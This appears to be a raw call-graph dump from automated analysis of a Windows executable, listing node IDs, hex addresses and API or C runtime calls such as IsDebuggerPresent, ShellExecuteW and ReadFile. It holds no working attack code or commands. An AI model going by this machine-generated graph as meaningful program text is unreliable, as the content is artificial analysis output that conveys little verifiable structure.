65741->65665 65742->65740 65742->65741 65743 416b24 Sleep 65742->65743 65744 416b39 65743->65744 65744->65741 65744->65742 65745->65678 65747 41377c __dosmaperr 65746->65747 65748 413753 RtlFreeHeap 65746->65748 65747->65676 65748->65747 65749 413768 65748->65749 65755 417f77 46 API calls __getptd_noexit 65749->65755 65751 41376e GetLastError 65751->65747 65756 417daa 65752->65756 65755->65751 65757 417dc9 __wctomb_s_l __call_reportfault 65756->65757 65758 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 65757->65758 65761 417eb5 __call_reportfault 65758->65761 65760 417ed1 GetCurrentProcess TerminateProcess 65760->65684 65762 41a208 65761->65762 65763 41a210 65762->65763 65764 41a212 IsDebuggerPresent 65762->65764 65763->65760 65770 41fe19 65764->65770 65767 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 65768 421ff0 __call_reportfault 65767->65768 65769 421ff8 GetCurrentProcess TerminateProcess 65767->65769 65768->65769 65769->65760 65770->65767 65771->65688 65773 408f48 moneypunct 65772->65773 65774 4265c7 VariantClear 65773->65774 65775 408f55 moneypunct 65773->65775 65774->65775 65775->65693 65832 40ebd0 65776->65832 65836 4182cb 65779->65836 65781 41195e 65843 4181f2 LeaveCriticalSection 65781->65843 65783 40d748 65784 4119b0 65783->65784 65785 4119d6 65784->65785 65786 4119bc 65784->65786 65785->65701 65786->65785 65878 417f77 46 API calls __getptd_noexit 65786->65878 65788 4119c6 65879 417f25 10 API calls __wcsnicmp 65788->65879 65790 4119d1 65790->65701 65791->65703 65880 401f20 65792->65880 65794 40d5b6 IsDebuggerPresent 65795 40d5c4 65794->65795 65796 42e1bb MessageBoxA 65794->65796 65797 42e1d4 65795->65797 65798 40d5e3 65795->65798 65796->65797 66051 403a50 52 API calls 3 library calls 65797->66051 65949 40f520 65798->65949 65802 40d63b 65805 40d643 65802->65805 65806 42e231 SetCurrentDirectoryW 65802->65806 65803 40d5fd GetFullPathNameW 65961 401460 65803->65961 65807 40d64c 65805->65807 66052 432fee 6 API calls 65805->66052 65806->65805 65976 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 65807->65976 65810 42e252 65810->65807 65812 42e25a GetModuleFileNameW 65810->65812 65814 42e274 65812->65814 65815 42e2cb GetForegroundWindow ShellExecuteW 65812->65815 66053 401b10 65814->66053 65817 40d688 65815->65817 65816 40d656 65819 40d669 65816->65819 65821 40e0c0 74 API calls 65816->65821 65823 40d692 SetCurrentDirectoryW 65817->65823 65984 4091e0 65819->65984 65821->65819 65823->65705 65826 42e28d 66060 40d200 52 API calls 2 library calls 65826->66060 65829 42e299 GetForegroundWindow ShellExecuteW 65830 42e2c6 65829->65830 65830->65817 65831 40ec00 LoadLibraryA GetProcAddress 65831->65696 65833 40d72e 65832->65833 65834 40ebd6 LoadLibraryA 65832->65834 65833->65696 65833->65831 65834->65833 65835 40ebe7 GetProcAddress 65834->65835 65835->65833 65837 4182e0 65836->65837 65838 4182f3 EnterCriticalSection 65836->65838 65844 418209 65837->65844 65838->65781 65840 4182e6 65840->65838 65871 411924 46 API calls 3 library calls 65840->65871 65843->65783 65845 418215 __wsopen_helper 65844->65845 65846 418225 65845->65846 65847 41823d 65845->65847 65872 418901 46 API calls __NMSG_WRITE 65846->65872 65849 416b04 __malloc_crt 45 API calls 65847->65849 65855 41824b __wsopen_helper 65847->65855 65851 418256 65849->65851 65850 41822a 65873 418752 46 API calls 6 library calls 65850->65873 65853 41825d 65851->65853 65854 41826c 65851->65854 65875 417f77 46 API calls __getptd_noexit 65853->65875 65858 4182cb __lock 45 API calls 65854->65858 65855->65840 65856 418231 65874 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 65856->65874 65860 418273 65858->65860 65862 4182a6 65860->65862 65863 41827b InitializeCriticalSectionAndSpinCount 65860->65863 65864 413748 _free 45 API calls 65862->65864 65865 418297 65863->65865 65866 41828b 65863->65866 65864->65865 65877 4182c2 LeaveCriticalSection _doexit 65865->65877 65867 413748 _free 45 API calls 65866->65867 65869 418291 65867->65869 65876 417f77 46 API calls __getptd_noexit 65869->65876 65872->65850 65873->65856 65875->65855 65876->65865 65877->65855 65878->65788 65879->65790 66061 40e6e0 65880->66061 65882 401f31 65883 401f41 GetModuleFileNameW 65882->65883 66064 410100 65883->66064 65885 401f5c 66076 410960 65885->66076 65888 401b10 52 API calls 65889 401f81 65888->65889 66079 401980 65889->66079 65891 401f8e 65892 408f40 VariantClear 65891->65892 65893 401f9d 65892->65893 65894 401b10 52 API calls 65893->65894 65895 401fb4 65894->65895 65896 401980 53 API calls 65895->65896 65897 401fc3 65896->65897 65898 401b10 52 API calls 65897->65898 65899 401fd2 65898->65899 66087 40c2c0 65899->66087 65901 401fe1 65902 40bc70 52 API calls 65901->65902 65903 401ff3 65902->65903 66105 401a10 65903->66105 65905 401ffe 66112 4114ab 65905->66112 65908 428b05 65910 401a10 52 API calls 65908->65910 65909 402017 65911 4114ab __wcsicoll 58 API calls 65909->65911 65912 428b18 65910->65912 65913 402022 65911->65913 65915 401a10 52 API calls 65912->65915 65913->65912 65914 40202d 65913->65914 65916 4114ab __wcsicoll 58 API calls 65914->65916 65917 428b33 65915->65917 65918 402038 65916->65918 65920 428b3b GetModuleFileNameW 65917->65920 65919 402043 65918->65919 65918->65920 65921 4114ab __wcsicoll 58 API calls 65919->65921 65922 401a10 52 API calls 65920->65922 65923 40204e 65921->65923 65924 428b6c 65922->65924 65925 402092 65923->65925 65929 401a10 52 API calls 65923->65929 65934 428b90 _wcscpy 65923->65934 65926 40e0a0 52 API calls 65924->65926 65928 4020a3 65925->65928 65925->65934 65927 428b7a 65926->65927 65930 401a10 52 API calls 65927->65930 65931 428bc6 65928->65931 66120 40e830 53 API calls 65928->66120 65932 402073 _wcscpy 65929->65932 65933 428b88 65930->65933 65940 401a10 52 API calls 65932->65940 65933->65934 65937 401a10 52 API calls 65934->65937 65936 4020bb 66121 40cf00 53 API calls 65936->66121 65944 4020d0 65937->65944 65939 4020c6 65941 408f40 VariantClear 65939->65941 65940->65925 65941->65944 65942 402110 65946 408f40 VariantClear 65942->65946 65944->65942 65947 401a10 52 API calls 65944->65947 66122 40cf00 53 API calls 65944->66122 66123 40e6a0 53 API calls 65944->66123 65948 402120 moneypunct 65946->65948 65947->65944 65948->65794 65950 40f53c 65949->65950 65952 4295c9 __wctomb_s_l 65949->65952 66795 410120 65950->66795 65954 4295d9 GetOpenFileNameW 65952->65954 65953 40f545 66799 4102b0 SHGetMalloc 65953->66799 65954->65950 65955 40d5f5 65954->65955 65955->65802 65955->65803 65957 40f54c 66804 410190 GetFullPathNameW 65957->66804 65959 40f559 66815 40f570 65959->66815 66877 402400 65961->66877 65963 40146f 65966 428c29 _wcscat 65963->65966 66886 401500 65963->66886 65965 40147c 65965->65966 66894 40d440 65965->66894 65968 401489 65968->65966 65969 401491 GetFullPathNameW 65968->65969 65970 402160 52 API calls 65969->65970 65971 4014bb 65970->65971 65972 402160 52 API calls 65971->65972 65973 4014c8 65972->65973 65973->65966 65974 402160 52 API calls 65973->65974 65975 4014ee 65974->65975 65975->65802 65977 428361 65976->65977 65978 4103fc LoadImageW RegisterClassExW 65976->65978 66914 44395e EnumResourceNamesW LoadImageW 65977->66914 66913 410490 7 API calls 65978->66913 65981 40d651 65983 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 65981->65983 65982 428368 65983->65816 65985 409202 65984->65985 65986 42d7ad 65984->65986 66041 409216 moneypunct 65985->66041 67177 410940 331 API calls 65985->67177 67180 45e737 90 API calls 3 library calls 65986->67180 65989 40939c 65989->65817 66050 401000 Shell_NotifyIconW __wctomb_s_l 65989->66050 65991 4095b2 65991->65989 65993 4095bf 65991->65993 65992 409253 PeekMessageW 65992->66041 67179 401a50 331 API calls 65993->67179 65995 42d8cd Sleep 65995->66041 65996 4095c6 LockWindowUpdate DestroyWindow GetMessageW 65996->65989 65999 4095f9 65996->65999 65998 42e13b 67198 40d410 VariantClear 65998->67198 66001 42e158 TranslateMessage DispatchMessageW GetMessageW 65999->66001 66001->66001 66005 42e188 66001->66005 66003 409567 PeekMessageW 66003->66041 66004 409386 66004->65989 67178 40f190 10 API calls 66004->67178 66005->65989 66008 44c29d 52 API calls 66049 4094e0 66008->66049 66009 46fdbf 108 API calls 66009->66049 66010 46f3c1 107 API calls 66010->66041 66011 40e0a0 52 API calls 66011->66041 66012 409551 TranslateMessage DispatchMessageW 66012->66003 66014 42dcd2 WaitForSingleObject 66017 42dcf0 GetExitCodeProcess CloseHandle 66014->66017 66014->66041 66015 42dd3d Sleep 66015->66049 66016 47d33e 309 API calls 66016->66041 67187 40d410 VariantClear 66017->67187 66021 4094cf Sleep 66021->66049 66023 40d410 VariantClear 66023->66041 66025 42d94d timeGetTime 67183 465124 53 API calls 66025->67183 66027 40c620 timeGetTime 66027->66049 66029 42dd89 CloseHandle 66029->66049 66031 465124 53 API calls 66031->66049 66032 42de19 GetExitCodeProcess CloseHandle 66032->66049 66035 42de88 Sleep 66035->66041 66040 45e737 90 API calls 66040->66041 66041->65992 66041->65995 66041->65998 66041->66003 66041->66004 66041->66010 66041->66011 66041->66012 66041->66014 66041->66015 66041->66016 66041->66021 66041->66023 66041->66025 66041->66040 66042 42e0cc VariantClear 66041->66042 66043 408f40 VariantClear 66041->66043 66041->66049 66915 4091b0 66041->66915 66973 40afa0 66041->66973 66999 408fc0 66041->66999 67034 408cc0 66041->67034 67048 4096a0 66041->67048 67175 40d150 TranslateAcceleratorW 66041->67175 67176 40d170 IsDialogMessageW GetClassLongW 66041->67176 67181 465124 53 API calls 66041->67181 67182 40c620 timeGetTime 66041->67182 67197 40e270 VariantClear moneypunct 66041->67197 66042->66041 66043->66041 66045 401980 53 API calls 66045->66049 66046 408f40 VariantClear 66046->66049 66047 401b10 52 API calls 66047->66049 66049->66008 66049->66009 66049->66027 66049->66029 66049->66031 66049->66032 66049->66035 66049->66041 66049->66045 66049->66046 66049->66047 67184 45178a 54 API calls 66049->67184 67185 47d33e 331 API calls 66049->67185 67186 453bc6 54 API calls 66049->67186 67188 40d410 VariantClear 66049->67188 67189 443d19 67 API calls _wcslen 66049->67189 67190 4574b4 VariantClear 66049->67190 67191 403cd0 66049->67191 67195 4731e1 VariantClear 66049->67195 67196 4331a2 6 API calls 66049->67196 66050->65817 66051->65802 66052->65810 66054 401b16 _wcslen 66053->66054 66055 4115d7 52 API calls 66054->66055 66057 401b63 66054->66057 66056 401b4b _memmove 66055->66056 66058 4115d7 52 API calls 66056->66058 66059 40d200 52 API calls 2 library calls 66057->66059 66058->66057 66059->65826 66060->65829 66062 40bc70 52 API calls 66061->66062 66063 40e6ee 66062->66063 66063->65882 66124 40f760 66064->66124 66067 410118 66067->65885 66069 42805d 66070 42806a 66069->66070 66180 431e58 66069->66180 66072 413748 _free 46 API calls 66070->66072 66073 428078 66072->66073 66074 431e58 82 API calls 66073->66074 66075 428084 66074->66075 66075->65885 66077 4115d7 52 API calls 66076->66077 66078 401f74 66077->66078 66078->65888 66080 4019a3 66079->66080 66086 401985 66079->66086 66081 4019b8 66080->66081 66080->66086 66784 403e10 53 API calls 66081->66784 66083 40199f 66083->65891 66085 4019c4 66085->65891 66086->66083 66783 403e10 53 API calls 66086->66783 66088 40c2c7 66087->66088 66089 40c30e 66087->66089 66090 40c2d3 66088->66090 66091 426c79 66088->66091 66092 40c315 66089->66092 66093 426c2b 66089->66093 66785 403ea0 52 API calls __cinit 66090->66785 66790 4534e3 52 API calls 66091->66790 66097 40c321 66092->66097 66102 426c5a 66092->66102 66095 426c4b 66093->66095 66096 426c2e 66093->66096 66788 4534e3 52 API calls 66095->66788 66103 40c2de 66096->66103 66787 4534e3 52 API calls 66096->66787 66786 403ea0 52 API calls __cinit 66097->66786 66789 4534e3 52 API calls 66102->66789 66103->65901 66106 401a30 66105->66106 66107 401a17 66105->66107 66109 402160 52 API calls 66106->66109 66108 401a2d 66107->66108 66791 403c30 52 API calls _memmove 66107->66791 66108->65905 66111 401a3d 66109->66111 66111->65905 66113 411523 66112->66113 66114 4114ba 66112->66114 66794 4113a8 58 API calls 3 library calls 66113->66794 66119 40200c 66114->66119 66792 417f77 46 API calls __getptd_noexit 66114->66792 66117 4114c6 66793 417f25 10 API calls __wcsnicmp 66117->66793 66119->65908 66119->65909 66120->65936 66121->65939 66122->65944 66123->65944 66184 40f6f0 66124->66184 66126 40f77b _strcat moneypunct 66192 40f850 66126->66192 66131 427c2a 66222 414d04 66131->66222 66133 40f7fc 66133->66131 66135 40f804 66133->66135 66209 414a46 66135->66209 66139 40f80e 66139->66067 66143 4528bd 66139->66143 66140 427c59 66228 414fe2 66140->66228 66142 427c79 66144 4150d1 _fseek 81 API calls 66143->66144 66145 452930 66144->66145 66725 452719 66145->66725 66148 452948 66148->66069 66149 414d04 __fread_nolock 61 API calls 66150 452966 66149->66150 66151 414d04 __fread_nolock 61 API calls 66150->66151 66152 452976 66151->66152 66153 414d04 __fread_nolock 61 API calls 66152->66153 66154 45298f 66153->66154 66155 414d04 __fread_nolock 61 API calls 66154->66155 66156 4529aa 66155->66156 66157 4150d1 _fseek 81 API calls 66156->66157 66158 4529c4 66157->66158 66159 4135bb _malloc 46 API calls 66158->66159 66160 4529cf 66159->66160 66161 4135bb _malloc 46 API calls 66160->66161 66162 4529db 66161->66162 66163 414d04 __fread_nolock 61 API calls 66162->66163 66164 4529ec 66163->66164 66165 44afef GetSystemTimeAsFileTime 66164->66165 66166 452a00 66165->66166 66167 452a36 66166->66167 66168 452a13 66166->66168 66169 452aa5 66167->66169 66170 452a3c 66167->66170 66171 413748 _free 46 API calls 66168->66171 66173 413748 _free 46 API calls 66169->66173 66731 44b1a9 66170->66731 66174 452a1c 66171->66174 66176 452aa3 66173->66176 66177 413748 _free 46 API calls 66174->66177 66175 452a9d 66179 413748 _free 46 API calls 66175->66179 66176->66069 66178 452a25 66177->66178 66178->66069 66179->66176 66181 431e64 66180->66181 66183 431e6a 66180->66183 66182 414a46 __fcloseall 82 API calls 66181->66182 66182->66183 66183->66070 66185 425de2 66184->66185 66186 40f6fc _wcslen 66184->66186 66185->66126 66187 40f710 WideCharToMultiByte 66186->66187 66188 40f756 66187->66188 66189 40f728 66187->66189 66188->66126 66190 4115d7 52 API calls 66189->66190 66191 40f735 WideCharToMultiByte 66190->66191 66191->66126 66194 40f85d __wctomb_s_l _strlen 66192->66194 66193 426b3b 66194->66193 66196 40f7ab 66194->66196 66241 414db8 66194->66241 66197 4149c2 66196->66197 66253 414904 66197->66253 66199 40f7e9 66199->66131 66200 40f5c0 66199->66200 66204 40f5cd _strcat __write_nolock _memmove 66200->66204 66201 414d04 __fread_nolock 61 API calls 66201->66204 66202 40f691 __tzset_nolock 66202->66133 66204->66201 66204->66202 66208 425d11 66204->66208 66341 4150d1 66204->66341 66205 4150d1 _fseek 81 API calls 66206 425d33 66205->66206 66207 414d04 __fread_nolock 61 API calls 66206->66207 66207->66202 66208->66205 66210 414a52 __wsopen_helper 66209->66210 66211 414a64 66210->66211 66212 414a79 66210->66212 66481 417f77 46 API calls __getptd_noexit 66211->66481 66215 415471 __lock_file 47 API calls 66212->66215 66221 414a74 __wsopen_helper 66212->66221 66214 414a69 66482 417f25 10 API calls __wcsnicmp 66214->66482 66217 414a92 66215->66217 66465 4149d9 66217->66465 66221->66139 66550 414c76 66222->66550 66224 414d1c 66225 44afef 66224->66225 66718 442c5a 66225->66718 66227 44b00d 66227->66140 66229 414fee __wsopen_helper 66228->66229 66230 414ffa 66229->66230 66231 41500f 66229->66231 66722 417f77 46 API calls __getptd_noexit 66230->66722 66233 415471 __lock_file 47 API calls 66231->66233 66235 415017 66233->66235 66234 414fff 66723 417f25 10 API calls __wcsnicmp 66234->66723 66237 414e4e __ftell_nolock 51 API calls 66235->66237 66238 415024 66237->66238 66724 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 66238->66724 66239 41500a __wsopen_helper 66239->66142 66242 414dd6 66241->66242 66243 414deb 66241->66243 66250 417f77 46 API calls __getptd_noexit 66242->66250 66243->66242 66245 414df2 66243->66245 66248 414de6 66245->66248 66252 418f98 77 API calls 5 library calls 66245->66252 66246 414ddb 66251 417f25 10 API calls __wcsnicmp 66246->66251 66248->66194 66250->66246 66251->66248 66252->66248 66255 414910 __wsopen_helper 66253->66255 66254 414923 66309 417f77 46 API calls __getptd_noexit 66254->66309 66255->66254 66257 414951 66255->66257 66272 41d4d1 66257->66272 66258 414928 66310 417f25 10 API calls __wcsnicmp 66258->66310 66261 414956 66262 41496a 66261->66262 66263 41495d 66261->66263 66265 414992 66262->66265 66266 414972 66262->66266 66311 417f77 46 API calls __getptd_noexit 66263->66311 66289 41d218 66265->66289 66312 417f77 46 API calls __getptd_noexit 66266->66312 66270 414933 __wsopen_helper @_EH4_CallFilterFunc@8 66270->66199 66273 41d4dd __wsopen_helper 66272->66273 66274 4182cb __lock 46 API calls 66273->66274 66286 41d4eb 66274->66286 66275 41d560 66314 41d5fb 66275->66314 66276 41d567 66278 416b04 __malloc_crt 46 API calls 66276->66278 66280 41d56e 66278->66280 66279 41d5f0 __wsopen_helper 66279->66261 66280->66275 66281 41d57c InitializeCriticalSectionAndSpinCount 66280->66281 66283 41d59c 66281->66283 66284 41d5af EnterCriticalSection 66281->66284 66287 413748 _free 46 API calls 66283->66287 66284->66275 66285 418209 __mtinitlocknum 46 API calls 66285->66286 66286->66275 66286->66276 66286->66285 66317 4154b2 47 API calls __lock 66286->66317 66318 415520 LeaveCriticalSection LeaveCriticalSection _doexit 66286->66318 66287->66275 66290 41d23a 66289->66290 66291 41d255 66290->66291 66303 41d26c __wopenfile 66290->66303 66323 417f77 46 API calls __getptd_noexit 66291->66323 66293 41d421 66296 41d47a 66293->66296 66297 41d48c 66293->66297 66294 41d25a 66324 417f25 10 API calls __wcsnicmp 66294->66324 66328 417f77 46 API calls __getptd_noexit 66296->66328 66320 422bf9 66297->66320 66300 41499d 66313 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 66300->66313 66301 41d47f 66329 417f25 10 API calls __wcsnicmp 66301->66329 66303->66293 66303->66296 66303->66303 66325 41341f 58 API calls 2 library calls 66303->66325 66305 41d41a 66305->66293 66326 41341f 58 API calls 2 library calls 66305->66326 66307 41d439 66307->66293 66327 41341f 58 API calls 2 library calls 66307->66327 66309->66258 66310->66270 66311->66270 66312->66270 66313->66270 66319 4181f2 LeaveCriticalSection 66314->66319 66316 41d602 66316->66279 66317->66286 66318->66286 66319->66316 66330 422b35 66320->66330 66322 422c14 66322->66300 66323->66294 66324->66300 66325->66305 66326->66307 66327->66293 66328->66301 66329->66300 66332 422b41 __wsopen_helper 66330->66332 66331 422b54 66333 417f77 __wcsnicmp 46 API calls 66331->66333 66332->66331 66334 422b8a 66332->66334 66335 422b59 66333->66335 66337 422400 __tsopen_nolock 109 API calls 66334->66337 66336 417f25 __wcsnicmp 10 API calls 66335->66336 66340 422b63 __wsopen_helper 66336->66340 66338 422ba4 66337->66338 66339 422bcb __wsopen_helper LeaveCriticalSection 66338->66339 66339->66340 66340->66322 66342 4150dd __wsopen_helper 66341->66342 66343 4150e9 66342->66343 66345 41510f 66342->66345 66372 417f77 46 API calls __getptd_noexit 66343->66372 66354 415471 66345->66354 66347 4150ee 66373 417f25 10 API calls __wcsnicmp 66347->66373 66353 4150f9 __wsopen_helper 66353->66204 66355 415483 66354->66355 66356 4154a5 EnterCriticalSection 66354->66356 66355->66356 66357 41548b 66355->66357 66358 415117 66356->66358 66359 4182cb __lock 46 API calls 66357->66359 66360 415047 66358->66360 66359->66358 66361 415067 66360->66361 66362 415057 66360->66362 66364 415079 66361->66364 66375 414e4e 66361->66375 66430 417f77 46 API calls __getptd_noexit 66362->66430 66392 41443c 66364->66392 66365 41505c 66374 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 66365->66374 66370 4150b9 66405 41e1f4 66370->66405 66372->66347 66373->66353 66374->66353 66376 414e61 66375->66376 66377 414e79 66375->66377 66431 417f77 46 API calls __getptd_noexit 66376->66431 66379 414139 __stbuf 46 API calls 66377->66379 66381 414e80 66379->66381 66380 414e66 66432 417f25 10 API calls __wcsnicmp 66380->66432 66384 41e1f4 __write 51 API calls 66381->66384 66383 414e71 66383->66364 66385 414e97 66384->66385 66385->66383 66386 414f09 66385->66386 66387 414ec9 66385->66387 66433 417f77 46 API calls __getptd_noexit 66386->66433 66387->66383 66389 41e1f4 __write 51 API calls 66387->66389 66390 414f64 66389->66390 66390->66383 66391 41e1f4 __write 51 API calls 66390->66391 66391->66383 66393 414455 66392->66393 66397 414477 66392->66397 66394 414139 __stbuf 46 API calls 66393->66394 66393->66397 66395 414470 66394->66395 66434 41b7b2 77 API calls 6 library calls 66395->66434 66398 414139 66397->66398 66399 414145 66398->66399 66400 41415a 66398->66400 66435 417f77 46 API calls __getptd_noexit 66399->66435 66400->66370 66402 41414a 66436 417f25 10 API calls __wcsnicmp 66402->66436 66404 414155 66404->66370 66406 41e200 __wsopen_helper 66405->66406 66407 41e223 66406->66407 66408 41e208 66406->66408 66410 41e22f 66407->66410 66413 41e269 66407->66413 66457 417f8a 46 API calls __getptd_noexit 66408->66457 66459 417f8a 46 API calls __getptd_noexit 66410->66459 66411 41e20d 66458 417f77 46 API calls __getptd_noexit 66411->66458 66437 41ae56 66413->66437 66415 41e234 66460 417f77 46 API calls __getptd_noexit 66415->66460 66418 41e26f 66420 41e291 66418->66420 66421 41e27d 66418->66421 66419 41e23c 66461 417f25 10 API calls __wcsnicmp 66419->66461 66462 417f77 46 API calls __getptd_noexit 66420->66462 66447 41e17f 66421->66447 66423 41e215 __wsopen_helper 66423->66365 66426 41e289 66464 41e2c0 LeaveCriticalSection __unlock_fhandle 66426->66464 66427 41e296 66463 417f8a 46 API calls __getptd_noexit 66427->66463 66430->66365 66431->66380 66432->66383 66433->66383 66434->66397 66435->66402 66436->66404 66438 41ae62 __wsopen_helper 66437->66438 66439 41aebc 66438->66439 66441 4182cb __lock 46 API calls 66438->66441 66440 41aec1 EnterCriticalSection 66439->66440 66442 41aede __wsopen_helper 66439->66442 66440->66442 66443 41ae8e 66441->66443 66442->66418 66444 41aeaa 66443->66444 66445 41ae97 InitializeCriticalSectionAndSpinCount 66443->66445 66446 41aeec ___lock_fhandle LeaveCriticalSection 66444->66446 66445->66444 66446->66439 66448 41aded __lseek_nolock 46 API calls 66447->66448 66449 41e18e 66448->66449 66450 41e1a4 SetFilePointer 66449->66450 66451 41e194 66449->66451 66453 41e1c3 66450->66453 66454 41e1bb GetLastError 66450->66454 66452 417f77 __wcsnicmp 46 API calls 66451->66452 66455 41e199 66452->66455 66453->66455 66456 417f9d __dosmaperr 46 API calls 66453->66456 66454->66453 66455->66426 66456->66455 66457->66411 66458->66423 66459->66415 66460->66419 66461->66423 66462->66427 66463->66426 66464->66423 66466 4149ea 66465->66466 66467 4149fe 66465->66467 66511 417f77 46 API calls __getptd_noexit 66466->66511 66470 41443c __flush 77 API calls 66467->66470 66479 4149fa 66467->66479 66469 4149ef 66512 417f25 10 API calls __wcsnicmp 66469->66512 66472 414a0a 66470->66472 66484 41d8c2 66472->66484 66475 414139 __stbuf 46 API calls 66476 414a18 66475->66476 66488 41d7fe 66476->66488 66478 414a1e 66478->66479 66480 413748 _free 46 API calls 66478->66480 66483 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 66479->66483 66480->66479 66481->66214 66482->66221 66483->66221 66485 41d8d2 66484->66485 66487 414a12 66484->66487 66486 413748 _free 46 API calls 66485->66486 66485->66487 66486->66487 66487->66475 66489 41d80a __wsopen_helper 66488->66489 66490 41d812 66489->66490 66491 41d82d 66489->66491 66528 417f8a 46 API calls __getptd_noexit 66490->66528 66492 41d839 66491->66492 66497 41d873 66491->66497 66530 417f8a 46 API calls __getptd_noexit 66492->66530 66495 41d817 66529 417f77 46 API calls __getptd_noexit 66495->66529 66496 41d83e 66531 417f77 46 API calls __getptd_noexit 66496->66531 66500 41ae56 ___lock_fhandle 48 API calls 66497->66500 66502 41d879 66500->66502 66501 41d846 66532 417f25 10 API calls __wcsnicmp 66501->66532 66504 41d893 66502->66504 66505 41d887 66502->66505 66533 417f77 46 API calls __getptd_noexit 66504->66533 66513 41d762 66505->66513 66508 41d88d 66534 41d8ba LeaveCriticalSection __unlock_fhandle 66508->66534 66510 41d81f __wsopen_helper 66510->66478 66511->66469 66512->66479 66535 41aded 66513->66535 66515 41d772 66516 41d7c8 66515->66516 66518 41d7a6 66515->66518 66520 41aded __lseek_nolock 46 API calls 66515->66520 66548 41ad67 47 API calls 2 library calls 66516->66548 66518->66516 66521 41aded __lseek_nolock 46 API calls 66518->66521 66519 41d7d0 66522 41d7f2 66519->66522 66549 417f9d 46 API calls 3 library calls 66519->66549 66523 41d79d 66520->66523 66524 41d7b2 CloseHandle 66521->66524 66522->66508 66526 41aded __lseek_nolock 46 API calls 66523->66526 66524->66516 66527 41d7be GetLastError 66524->66527 66526->66518 66527->66516 66528->66495 66529->66510 66530->66496 66531->66501 66532->66510 66533->66508 66534->66510 66536 41ae12 66535->66536 66537 41adfa 66535->66537 66539 417f8a __read_nolock 46 API calls 66536->66539 66542 41ae51 66536->66542 66538 417f8a __read_nolock 46 API calls 66537->66538 66540 41adff 66538->66540 66541 41ae23 66539->66541 66543 417f77 __wcsnicmp 46 API calls 66540->66543 66544 417f77 __wcsnicmp 46 API calls 66541->66544 66542->66515 66545 41ae07 66543->66545 66546 41ae2b 66544->66546 66545->66515 66547 417f25 __wcsnicmp 10 API calls 66546->66547 66547->66545 66548->66519 66549->66522 66551 414c82 __wsopen_helper 66550->66551 66552 414cc3 66551->66552 66553 414cbb __wsopen_helper 66551->66553 66558 414c96 __wctomb_s_l 66551->66558 66554 415471 __lock_file 47 API calls 66552->66554 66553->66224 66555 414ccb 66554->66555 66563 414aba 66555->66563 66577 417f77 46 API calls __getptd_noexit 66558->66577 66559 414cb0 66578 417f25 10 API calls __wcsnicmp 66559->66578 66567 414ad8 __wctomb_s_l 66563->66567 66570 414af2 66563->66570 66564 414ae2 66630 417f77 46 API calls __getptd_noexit 66564->66630 66566 414ae7 66631 417f25 10 API calls __wcsnicmp 66566->66631 66567->66564 66567->66570 66574 414b2d 66567->66574 66579 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 66570->66579 66571 414c38 __wctomb_s_l 66633 417f77 46 API calls __getptd_noexit 66571->66633 66572 414139 __stbuf 46 API calls 66572->66574 66574->66570 66574->66571 66574->66572 66580 41dfcc 66574->66580 66610 41d8f3 66574->66610 66632 41e0c2 46 API calls 3 library calls 66574->66632 66577->66559 66578->66553 66579->66553 66581 41dfd8 __wsopen_helper 66580->66581 66582 41dfe0 66581->66582 66583 41dffb 66581->66583 66703 417f8a 46 API calls __getptd_noexit 66582->66703 66585 41e007 66583->66585 66588 41e041 66583->66588 66705 417f8a 46 API calls __getptd_noexit 66585->66705 66586 41dfe5 66704 417f77 46 API calls __getptd_noexit 66586->66704 66592 41e063 66588->66592 66593 41e04e 66588->66593 66590 41e00c 66706 417f77 46 API calls __getptd_noexit 66590->66706 66596 41ae56 ___lock_fhandle 48 API calls 66592->66596 66708 417f8a 46 API calls __getptd_noexit 66593->66708 66594 41e014 66707 417f25 10 API calls __wcsnicmp 66594->66707 66598 41e069 66596->66598 66597 41e053 66709 417f77 46 API calls __getptd_noexit 66597->66709 66602 41e077 66598->66602 66603 41e08b 66598->66603 66601 41dfed __wsopen_helper 66601->66574 66634 41da15 66602->66634 66710 417f77 46 API calls __getptd_noexit 66603->66710 66606 41e083 66712 41e0ba LeaveCriticalSection __unlock_fhandle 66606->66712 66607 41e090 66711 417f8a 46 API calls __getptd_noexit 66607->66711 66611 41d900 66610->66611 66615 41d915 66610->66615 66716 417f77 46 API calls __getptd_noexit 66611->66716 66613 41d910 66613->66574 66614 41d905 66717 417f25 10 API calls __wcsnicmp 66614->66717 66615->66613 66617 41d94a 66615->66617 66713 420603 66615->66713 66619 414139 __stbuf 46 API calls 66617->66619 66620 41d95e 66619->66620 66621 41dfcc __read 59 API calls 66620->66621 66622 41d965 66621->66622 66622->66613 66623 414139 __stbuf 46 API calls 66622->66623 66624 41d988 66623->66624 66624->66613 66625 414139 __stbuf 46 API calls 66624->66625 66626 41d994 66625->66626 66626->66613 66627 414139 __stbuf 46 API calls 66626->66627 66628 41d9a1 66627->66628 66629 414139 __stbuf 46 API calls 66628->66629 66629->66613 66630->66566 66631->66570 66632->66574 66633->66566 66635 41da31 66634->66635 66636 41da4c 66634->66636 66637 417f8a __read_nolock 46 API calls 66635->66637 66638 41da5b 66636->66638 66640 41da7a 66636->66640 66639 41da36 66637->66639 66641 417f8a __read_nolock 46 API calls 66638->66641 66642 417f77 __wcsnicmp 46 API calls 66639->66642 66644 41da98 66640->66644 66657 41daac 66640->66657 66643 41da60 66641->66643 66646 41da3e 66642->66646 66648 417f77 __wcsnicmp 46 API calls 66643->66648 66645 417f8a __read_nolock 46 API calls 66644->66645 66649 41da9d 66645->66649 66646->66606 66647 41db02 66651 417f8a __read_nolock 46 API calls 66647->66651 66650 41da67 66648->66650 66653 417f77 __wcsnicmp 46 API calls 66649->66653 66654 417f25 __wcsnicmp 10 API calls 66650->66654 66652 41db07 66651->66652 66655 417f77 __wcsnicmp 46 API calls 66652->66655 66656 41daa4 66653->66656 66654->66646 66655->66656 66659 417f25 __wcsnicmp 10 API calls 66656->66659 66657->66646 66657->66647 66658 41dae1 66657->66658 66661 41db1b 66657->66661 66658->66647 66660 41daec ReadFile 66658->66660 66659->66646 66665 41dc17 66660->66665 66666 41df8f GetLastError 66660->66666 66663 416b04 __malloc_crt 46 API calls 66661->66663 66664 41db31 